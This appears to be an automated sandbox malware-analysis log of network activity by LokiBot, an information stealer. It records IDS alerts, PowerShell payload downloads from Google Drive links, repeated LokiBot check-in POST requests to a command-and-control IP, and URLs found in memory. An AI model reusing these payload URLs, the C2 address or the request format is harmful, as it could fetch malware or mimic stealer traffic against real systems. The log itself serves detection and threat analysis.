                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49732 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49732 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49736 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49724 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49724 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49737 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49737 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49724 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49724 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49737 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49737 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49721 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49721 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49734 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49734 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49721 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49721 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49734 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49734 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49739 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49739 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49739 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49739 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49738 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49738 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49738 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49738 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49717 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49717 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49735 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49735 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49717 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49717 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49735 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49735 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49736 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49736 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49736 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49733 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49733 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49733 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49733 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49725 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49725 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49725 -> 137.184.191.215:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49725 -> 137.184.191.215:80
                Source: Joe Sandbox ViewIP Address: 137.184.191.215 137.184.191.215
                Source: Joe Sandbox ViewASN Name: PANDGUS PANDGUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49707 -> 142.250.185.142:443
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1E22hSDRfLSpLThmHE9wjUGQc-tb9axJL HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /download?id=1E22hSDRfLSpLThmHE9wjUGQc-tb9axJL&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /download?id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 192Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 192Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 165Connection: close
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: unknownTCP traffic detected without corresponding DNS query: 137.184.191.215
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1E22hSDRfLSpLThmHE9wjUGQc-tb9axJL HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /download?id=1E22hSDRfLSpLThmHE9wjUGQc-tb9axJL&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /download?id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: drive.google.com
                Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                Source: unknownHTTP traffic detected: POST /index.php/10899 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 137.184.191.215Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F612A844Content-Length: 192Connection: close
                Source: dxdiag.exe, 00000019.00000002.2609487387.0000000007708000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000002.2609487387.0000000007735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://137.184.191.215/index.php/10899
                Source: dxdiag.exe, 00000019.00000002.2609487387.0000000007708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://137.184.191.215/index.php/10899x
                Source: powershell.exe, 00000008.00000002.1402272979.000001AB6488E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
                Source: powershell.exe, 00000008.00000002.1402272979.000001AB648C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
                Source: powershell.exe, 00000008.00000002.1444100638.000001AB72CA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2333844590.000000000593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 0000000B.00000002.2320104599.0000000004A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000008.00000002.1402272979.000001AB62C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2320104599.00000000048D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000008.00000002.1468130265.000001AB7B230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://w7icrosoft.com
                Source: powershell.exe, 0000000B.00000002.2320104599.0000000004A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000008.00000002.1402272979.000001AB62C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 0000000B.00000002.2320104599.00000000048D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: powershell.exe, 00000008.00000002.1402272979.000001AB6488E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB630C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B0000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.1782637511.000000000773A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                Source: powershell.exe, 0000000B.00000002.2333844590.000000000593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 0000000B.00000002.2333844590.000000000593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 0000000B.00000002.2333844590.000000000593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000008.00000002.1402272979.000001AB6488A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
                Source: dxdiag.exe, 00000019.00000002.2609487387.0000000007708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google
                Source: powershell.exe, 00000008.00000002.1402272979.000001AB62E58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB64866000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
                Source: dxdiag.exe, 00000019.00000002.2609487387.00000000076C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                Source: powershell.exe, 00000008.00000002.1402272979.000001AB62E58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1E22hSDRfLSpLThmHE9wjUGQc-tb9axJLP
                Source: powershell.exe, 0000000B.00000002.2320104599.0000000004A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1E22hSDRfLSpLThmHE9wjUGQc-tb9axJLXR
                Source: dxdiag.exe, 00000019.00000002.2609487387.00000000076C8000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000002.2620505003.00000000226F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f
                Source: dxdiag.exe, 00000019.00000002.2609487387.00000000076C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f(
                Source: powershell.exe, 00000008.00000002.1402272979.000001AB648B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googh(
                Source: powershell.exe, 00000008.00000002.1402272979.000001AB648B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB630C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
                Source: dxdiag.exe, 00000019.00000002.2609487387.0000000007735000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                Source: powershell.exe, 00000008.00000002.1402272979.000001AB6488E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB630C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB630C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1E22hSDRfLSpLThmHE9wjUGQc-tb9axJL&export=download
                Source: dxdiag.exe, 00000019.00000002.2609487387.00000000076C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f&export=download
                Source: powershell.exe, 0000000B.00000002.2320104599.0000000004A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000008.00000002.1402272979.000001AB63F65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 00000008.00000002.1444100638.000001AB72CA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2333844590.000000000593A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000008.00000002.1402272979.000001AB6488E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB630C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B0000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.1782637511.000000000773A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                Source: dxdiag.exe, 00000019.00000002.2609487387.0000000007708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wordpress.org/documentation/article/faq-troubleshooting/
                Source: powershell.exe, 00000008.00000002.1402272979.000001AB6488E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB630C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B0000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.1782637511.000000000773A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                Source: powershell.exe, 00000008.00000002.1402272979.000001AB6488E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB630C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1402272979.000001AB648B0000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000019.00000003.1782637511.000000000773A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
